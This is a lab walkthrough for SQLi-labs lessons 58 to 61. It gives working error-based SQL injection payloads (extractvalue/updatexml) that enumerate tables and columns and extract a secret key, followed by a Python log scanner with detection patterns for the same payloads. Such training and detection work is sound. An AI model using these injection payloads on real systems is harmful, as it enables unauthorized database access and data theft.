Error based. UNION SELECT does not work here, so we use the MySQL XML functions extractvalue() and updatexml() instead: both raise an XPATH syntax error that echoes the injected value back in the error message. The challenge regenerates its random table and column names, which is why the extractvalue() and updatexml() variants below show different names.

SQLi-labs: Lesson 58

  1. Get table name

    Query: ?id=1' and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c))--+

    or

    ?id=1' and updatexml(1, concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1)--+

    Result: XPATH syntax error: '\FAIDJ52R9T\'

  2. Get column name

    Query: ?id=' or extractvalue(1,concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='FAIDJ52R9T')))--+

    or

    ?id=1' and updatexml(1, concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='LRFHZR6XJ2'),0x5c),1)--+

    Result: XPATH syntax error: '\id,sessid,secret_6769,tryy'

  3. Get secret

    Query: ?id=' or extractvalue(1,concat(0x7e, (select secret_6769 from FAIDJ52R9T),0x7e))--+

    or

    ?id=1' and updatexml(1, concat(0x7e,(select secret_VOOL from LRFHZR6XJ2),0x7e),1)--+

    Result: XPATH syntax error: '~tdlUZTnroaenQOKDzUEDaU5N~'

  4. Submit the secret key: tdlUZTnroaenQOKDzUEDaU5N


SQLi-labs: Lesson 59

Integer based: no quote is needed to break out of the value. The queries are the same as in Lesson 58, minus the single quote.

e.g. ?id=1 and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c))--+


SQLi-labs: Lesson 60

Double quote, single parenthesis based. The queries are the same as before, apart from closing the context with ") first.

e.g. ?id=1") and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c))--+


SQLi-labs: Lesson 61

Source code: $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

Single quote, double parenthesis based: the injected value has to close the quote and both parentheses with ')) before the rest of the payload.

e.g. ?id=1')) and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c))--+
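As an added defender's example (not part of the original writeup or of SQLi-labs), a small Python checker that URL-decodes the request path of constructed web-server log lines and flags the extractvalue()/updatexml() error-based pattern used in Lessons 58 to 61, plus a helper that spots the "XPATH syntax error" text in a response body, the symptom that database errors are being reflected to the client. The log format and all addresses are constructed for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page): client, method, path, status.
SAMPLE_LOG = """\
10.0.0.5 GET /Less-58/?id=1 200
10.0.0.9 GET /Less-58/?id=1%27%20and%20extractvalue(1,concat(0x5c,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),0x5c))--+ 200
10.0.0.9 GET /Less-61/?id=1%27))%20and%20updatexml(1,concat(0x7e,(select%20secret_6769%20from%20FAIDJ52R9T),0x7e),1)--+ 200
10.0.0.7 GET /Less-59/?id=2 200
"""

# The error-based primitive from these lessons: extractvalue()/updatexml() wrapping a
# concat() whose 0x5c or 0x7e delimiter makes the reflected value easy to pick out.
XML_ERROR_FN = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.IGNORECASE)
CONCAT_MARKER = re.compile(r"concat\s*\(\s*0x(5c|7e)", re.IGNORECASE)
SCHEMA_PROBE = re.compile(r"information_schema\.(tables|columns)", re.IGNORECASE)

def classify_request(raw_path: str) -> List[str]:
    # Decode %27 -> ' and + -> space so we match what the database actually receives.
    decoded = unquote_plus(raw_path)
    hits = []
    if XML_ERROR_FN.search(decoded):
        hits.append("xml-error-function")
    if CONCAT_MARKER.search(decoded):
        hits.append("concat-delimiter")
    if SCHEMA_PROBE.search(decoded):
        hits.append("schema-enumeration")
    return hits

def scan_log(log_text: str) -> List[Tuple[str, str, List[str]]]:
    # Return (client, raw path, indicators) for every line carrying at least one indicator.
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        client, path = parts[0], parts[2]
        hits = classify_request(path)
        if hits:
            findings.append((client, path, hits))
    return findings

# Server side: MySQL's XPATH error text reaching the HTTP response is the leak itself.
XPATH_LEAK = re.compile(r"XPATH syntax error: '(.*?)'")

def leaked_value(response_body: str) -> Optional[str]:
    # Return the reflected value if an XPATH syntax error was echoed to the client.
    m = XPATH_LEAK.search(response_body)
    return m.group(1) if m else None
```

Seeing leaked_value() return anything in production traffic means error details are reaching users; the fix on the application side is a parameterised query plus generic error pages, not a filter on these keywords.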

